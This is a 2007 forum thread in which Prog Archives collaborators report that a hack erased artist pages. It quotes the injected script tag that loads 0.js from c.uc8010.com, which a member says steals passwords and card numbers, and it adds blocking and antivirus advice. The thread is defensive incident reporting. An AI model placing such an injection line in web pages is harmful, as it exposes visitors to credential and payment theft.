Forum Home Forum Home > Site News, Newbies, Help and Improvements > Report errors & omissions here
  New Posts New Posts RSS Feed - Anathema: Left overs from the recent hack
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Topic ClosedAnathema: Left overs from the recent hack

 Post Reply Post Reply
Author
Message
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Topic: Anathema: Left overs from the recent hack
    Posted: December 28 2007 at 08:11

I found this in Report Bugs here:
http://www.progarchives.com/forum/forum_posts.asp?TID=44668

Probably also other bio's are affected...




Edited by Angelo - December 28 2007 at 09:42
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Posted: December 28 2007 at 10:35
Van Der Graaff Generator bio is also damaged and the picture gone....
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Atkingani View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: October 21 2005
Location: Terra Brasilis
Status: Offline
Points: 12288
Direct Link To This Post Posted: December 28 2007 at 10:50
I'm afraid the problem could be worse...
Check the ULVER page:
Guigo

~~~~~~
Back to Top
Tuzvihar View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: May 18 2005
Location: C. Schinesghe
Status: Offline
Points: 13536
Direct Link To This Post Posted: December 28 2007 at 10:53
My post from the other thread:
Originally posted by Tuzvihar Tuzvihar wrote:

There is also lacking a picture for this album.

I couldn't find it...
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski
Back to Top
Atkingani View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: October 21 2005
Location: Terra Brasilis
Status: Offline
Points: 12288
Direct Link To This Post Posted: December 28 2007 at 10:54
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
 
Are we under attack?


Edited by Atkingani - December 28 2007 at 10:55
Guigo

~~~~~~
Back to Top
Easy Livin View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: February 21 2004
Location: Scotland
Status: Offline
Points: 15585
Direct Link To This Post Posted: December 28 2007 at 10:58
I think this must be a new bug. I've contacted M@x about it but it looks more prosaic.
Back to Top
chamberry View Drop Down
Special Collaborator
Special Collaborator

Honorary Collaborator

Joined: October 24 2005
Location: Puerto Rico
Status: Offline
Points: 9008
Direct Link To This Post Posted: December 28 2007 at 11:34
Just found out that John Zorn's band page looks weird too:
http://www.progarchives.com/artist.asp?id=2212


Back to Top
Tuzvihar View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: May 18 2005
Location: C. Schinesghe
Status: Offline
Points: 13536
Direct Link To This Post Posted: December 28 2007 at 11:36
I randomly checked also Le Orme, Porcupine tree, Vangelis... It looks like it affected every artist page.
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski
Back to Top
chamberry View Drop Down
Special Collaborator
Special Collaborator

Honorary Collaborator

Joined: October 24 2005
Location: Puerto Rico
Status: Offline
Points: 9008
Direct Link To This Post Posted: December 28 2007 at 11:39
Also, the streamable MP3s are missing. Confused


Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: December 28 2007 at 12:12
Yep, this is a new attack - even the main forum page is taking minutes to load.
 
If there is anything you want me to do just ask, (not that the prospect of rebuilding the bio pages is cheering me up anyDisapprove).
What?
Back to Top
Tuzvihar View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator

Joined: May 18 2005
Location: C. Schinesghe
Status: Offline
Points: 13536
Direct Link To This Post Posted: December 28 2007 at 12:32
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>. OuchAngryCry

Edited by Tuzvihar - December 28 2007 at 12:36
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."

Charles Bukowski
Back to Top
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Posted: December 28 2007 at 12:40
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage...

ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Dim View Drop Down
Prog Reviewer
Prog Reviewer


Joined: April 17 2007
Location: Austin TX
Status: Offline
Points: 6890
Direct Link To This Post Posted: December 28 2007 at 12:47
Damn, is there anything we can do?
Back to Top
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Posted: December 28 2007 at 12:55
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: December 28 2007 at 12:56
Run and hide. Stern%20Smile
 
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.
What?
Back to Top
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Posted: December 28 2007 at 13:16
Where did you find that. Dean?

Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...)


Edited by Angelo - December 28 2007 at 13:18
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Dean View Drop Down
Special Collaborator
Special Collaborator
Avatar
Retired Admin and Amateur Layabout

Joined: May 13 2007
Location: Europe
Status: Offline
Points: 37575
Direct Link To This Post Posted: December 28 2007 at 13:40
My initial thoughs are confirmed - the Forum main page is also affected.
 
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
 
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
 
If you know how, then set your IP blocker to block address 61.188.39.218
 
If you are unprotected, then keep away from the PA until the problem is fixed.
What?
Back to Top
Magic Mountain View Drop Down
Forum Senior Member
Forum Senior Member
Avatar

Joined: March 21 2006
Location: United States
Status: Offline
Points: 163
Direct Link To This Post Posted: December 28 2007 at 14:49
I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page"  referred to above and my virus software did not catch it.  The main page did not load and had the message "Error on he Page" in the lower left-hand corner of the browser.  Does this mean the script has executed and all of my passwords and credit card information has been transmitted?  What is my next step?
Back to Top
Angelo View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: May 07 2006
Location: Italy
Status: Offline
Points: 13244
Direct Link To This Post Posted: December 28 2007 at 15:24
^ I'll Send you a PM

The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things.

In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card number and passwords the moment they are typed in. Any good virus protection tool should catch those. People who don't have one installed I would advise to install and run one (Avast is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services.

Hope no big damage is done to anyone!


Edited by Angelo - December 28 2007 at 15:34
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected]
Back to Top
Atkingani View Drop Down
Special Collaborator
Special Collaborator
Avatar
Honorary Collaborator / Retired Admin

Joined: October 21 2005
Location: Terra Brasilis
Status: Offline
Points: 12288
Direct Link To This Post Posted: December 28 2007 at 15:41
The main database is still off... maybe M@x is recovering it.
Guigo

~~~~~~
Back to Top
 Post Reply Post Reply

Forum Jump Forum Permissions View Drop Down



This page was generated in 0.115 seconds.
Donate monthly and keep PA fast-loading and ad-free forever.